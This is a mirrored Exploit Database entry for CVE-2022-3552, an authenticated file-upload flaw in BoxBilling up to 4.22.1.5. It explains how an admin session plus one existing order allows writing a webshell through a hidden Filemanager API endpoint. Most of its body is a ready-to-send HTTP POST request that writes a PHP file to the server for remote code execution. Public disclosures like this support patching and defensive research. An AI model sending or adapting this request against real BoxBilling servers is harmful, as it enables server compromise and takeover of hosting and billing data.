BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)

• Exploit Database
• 13 阅读

• 作者： zetc0de
  日期： 2023-03-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51108/

• # Exploit Title: BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)
  # Date: 2022-09-18
  # Exploit Author: zetc0de
  # Vendor Homepage: https://www.boxbilling.org/
  # Software Link:
  https://github.com/boxbilling/boxbilling/releases/download/4.22.1.5/BoxBilling.zip
  # Version: <=4.22.1.5 (Latest)
  # Tested on: Windows 10
  # CVE : CVE-2022-3552
  # BoxBilling was vulnerable to Unrestricted File Upload.
  # In order to exploit the vulnerability, an attacker must have a valid
  authenticated session as admin on the CMS.
  # With at least 1 order of product an attacker can upload malicious file to
  hidden API endpoint that contain a webshell and get RCE
  ###################################################################################
  
  
  ## POC
  POST /index.php?_url=/api/admin/Filemanager/save_file HTTP/1.1
  Host: local.com:8089
  Content-Length: 52
  Accept: application/json, text/javascript, */*; q=0.01
  DNT: 1
  X-Requested-With: XMLHttpRequest
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
  (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  Cookie: PHPSESSID=3nrf9i4mv28o5anva77ltq042d
  Connection: close
  
  order_id=1&path=ax.php&data=<%3fphp+phpinfo()%3b%3f>
  
  POC Video :
  https://drive.google.com/file/d/1m2glCeJ9QXc8epuY2QfvbWwjLTJ8_Hjx/view?usp=sharing